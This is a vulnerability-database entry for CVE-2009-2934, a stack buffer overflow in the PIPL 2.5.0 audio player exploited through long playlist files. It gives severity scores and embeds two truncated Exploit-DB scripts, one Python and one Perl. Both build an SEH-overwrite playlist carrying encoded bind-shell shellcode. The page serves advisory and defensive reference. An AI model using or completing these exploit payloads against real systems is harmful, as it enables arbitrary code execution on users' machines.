CVE-2009-2934
published 2009-08-21CVE-2009-2934: Multiple stack-based buffer overflows in xaudio.dll in Programmed Integration PIPL 2.5.0 and 2.5.0D allow remote attackers to execute arbitrary code via a long…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
10.18%
95.1th percentile
Multiple stack-based buffer overflows in xaudio.dll in Programmed Integration PIPL 2.5.0 and 2.5.0D allow remote attackers to execute arbitrary code via a long string in a (1) .pls or (2) .pl playlist file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| programmedintegration | pipl | — | — |
| programmedintegration | pipl | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)
exploitdb·2009-08-28
CVE-2009-2934 PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)
PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)
---
#!/usr/bin/python
#
#############################################################
# PIPL
#
print "[+] Pipl 2.5.0 local exploit"
bof="\x41" * 4108
nsh="\xEB\x06\x90\x90"
seh="\x17\x07\x01\x10" #xaudio.dll ppr
nops="\x90" * 20
# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com */
sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x
Exploit-DB
pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)
exploitdb·2009-08-13
CVE-2009-2934 pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)
pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# pIPL V 2.5.0 (.PLS /.PL) Universal Local Buffer Exploit (SEH)
# http://www.programmedintegration.com/files/pipl.exe
# ## easy #### this work sooooooooo good############################
####################################################################
# USE>>LOAD PLAYLIST>>HACK4LOVE.PLS>>DOUBLE CLICK TO PLAY >BOOM CALC
####################################################################
my $bof="\x41" x 4108;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x17\x07\x01\x10";#xaudio.dll####P/P/R
my $nop="\x90" x 20;
####################################################################
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\
No writeups or analysis indexed.
http://osvdb.org/56996http://secunia.com/advisories/36297http://www.exploit-db.com/exploits/9428https://exchange.xforce.ibmcloud.com/vulnerabilities/52440http://osvdb.org/56996http://secunia.com/advisories/36297http://www.exploit-db.com/exploits/9428https://exchange.xforce.ibmcloud.com/vulnerabilities/52440
2009-08-21
Published